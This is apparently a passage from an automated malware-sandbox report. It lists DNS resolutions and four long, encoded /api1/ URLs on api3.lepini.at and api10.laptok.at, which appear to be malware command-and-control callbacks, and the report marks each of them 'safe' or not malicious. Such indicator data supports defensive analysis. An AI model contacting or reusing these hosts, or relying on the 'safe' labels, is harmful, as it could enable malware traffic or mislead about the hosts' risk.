resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 45.138.24.6 true
api10.laptok.at 45.138.24.6 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api3.lepini.at/api1/TZTh6_2BkS3c6X/g2npKVRL7cED2dW4yfoz7/1IAgoDfDBaFBh7Kf/s6YPUhhW_2FFOZ4/UfzmASW14dw3GpBMgd/QQTnLy2bn/m47chdfHlbOoStOxiBbF/PVT2YFBWKLhFbou4dcn/rE5edFIASJWWcLmRPujXLx/YI4PYsQdo9LaX/3eFG1EEZ/Sr_2BcwaypXnMHBWu5GiCkg/zhC1mAh91E/nklp0T0h9PwUy8pf3/AvjhI9VAq5aQ/c4y8dg0dcfo/9agKfUuutMqiH4/39h5RIbncwwhgCP2Fp4X_/2F1RiD0H_2BsV2ed/FGqO7Z8iv/B false
  • Avira URL Cloud: safe
 unknown
http://api3.lepini.at/api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5/5R_2FdKLiGt3q/T_2FbZYT/PDvrYRscHMvAhEzl_2F_2B0/2ikk6uOsaJ/kIfnZQ1ztpC62gFGv/P1mqwU8mDefG/yjBn2N1MiSD/GUZwJFX3oztFwR/onkOOAeBD5WkYQs_2FJht/8kT_2FI3gWn_2BJh/eIjqJ1W8_2FQNm2/Ia6dzqJh5iH4SrCJDK/5Piz1ULur/BABO6rSkLO4ShfMGkMUu/cDt8M0heKfxbEyNRecC/6zuUh3b4d0zydbKfh/4j1x false
  • Avira URL Cloud: safe
 unknown
http://api10.laptok.at/api1/CFw0exYOLBE1WOQ6Mn_2BQq/AbMRr9o39B/QrT2i_2BUXb4t9pmn/0lERtiOHlDPB/RvBQZDQ0_2B/XcdNPmTbjSCSkh/LGQj235_2Bzaj4iiE_2BZ/8BOeUfWxCKBDqbW5/305v3z_2Ba56K_2/BNLTprCr0kysMxydNd/QsemKPZya/UWdQMBXIKo51HLvlVE_2/F3BBwvriajKBQr8Ak4R/aT9_2Bw9XoTYMHGlK7kzVs/5gAtMcR1uDZ1K/ECQPLzKd/mvsohtKAfiZi1BZl2tbNMzk/iXtWcjTRcn/5oeMCiT_2BqRqn61F/cBlYM5UfYYiG/Fi3kDfXZStE/6LqXXR_2F0pKhw/O_2Brkkk/_2F false
  • Avira URL Cloud: safe
 unknown
http://api3.lepini.at/api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2BiwLk/OvzwM3VHZTr_/2Bi5hCWeweE/RDbM_2FDLormln/D5u23sLsNQY4uTSsot2UU/aPO_2FNPBiGyGyqq/s7z4x4ukwrK32If/M9iLwjW2qV3Vr8dNGH/q140lsiDv/T7miJKK0tGN_2FJkKKLX/Cm6sjguLhyPX9arxoel/JMM2f5VEC0AG9Wn6vSkHjJ/nDToUkTHrKvpT/3Wk4CBsP/r0HCE6xNU4Qc_2FkWiw3FEh/ucPyPfDjzrsgr097bADyD/Lr false
  • Avira URL Cloud: safe
 unknown